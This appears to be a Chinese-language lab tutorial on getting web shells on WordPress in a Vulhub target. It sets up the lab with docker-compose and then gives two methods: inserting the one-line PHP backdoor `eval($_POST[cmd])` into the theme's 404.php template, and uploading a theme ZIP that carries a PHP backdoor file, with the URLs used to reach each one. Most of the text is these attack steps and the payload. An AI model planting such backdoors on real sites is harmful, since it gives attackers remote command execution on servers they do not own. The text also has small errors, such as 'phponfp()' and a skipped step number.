常⻅CMS漏洞之一:WordPress
WordPress是⼀个以PHP和MySQL为平台的⾃由开源的博客软件和内容管理系统。WordPress具有插件架构和模板系统。截⾄2018年4⽉,排名前1000万的⽹站中超过30.6%使⽤WordPress。
WordPress是最受欢迎的⽹站 内容管理系统。全球有⼤约30%的⽹站(7亿5000个)都是使⽤WordPress架设⽹站的。WordPress是⽬前 因特⽹上最流⾏的博客系统。WordPress在最著名的⽹络发布阶段中脱颖⽽出。如今,它被使⽤在超过7000万个站点上。
姿势一:后台修改模板拿WebShell
1.在宝塔界面进⼊Vulhub靶场并执⾏以下命令开启靶场;在浏览器中访问并安装好....
#执⾏命令
cd /vulhub/wordpress/pwnscriptum
docker-compose up -d
#靶场地址
http://166.108.234.191:8080/wp-admin/
2.修改其WP的模板写⼊⼀句话⽊⻢后⻔并访问其⽂件即可GetShell;登陆WP后点击 【外观】 --》 【编辑】 -》 404.php
3.在其404模板中插⼊⼀句话⽊⻢代码..点击 【更新⽂件】 按钮
<?php eval($_POST[cmd]);?>5.访问以下连接即可获取WebShell..
http://166.108.234.191:8080/wp-content/themes/twentyfifteen/404.php
姿势⼆:上传主题拿WebShell
1.将带有phponfp();的⽂件加⼊到主题中并将主题压缩为ZIP⽂件...点击 【外观】 --》 【主题】 --》 【添加】 --》 【上传主题】 --》 【浏览】 --》 【现在安装】
2.安装成功后访问主题下的⽹站后⻔⽂件
http://166.108.234.191:8080/wp-content/themes/qzdy-master/6.php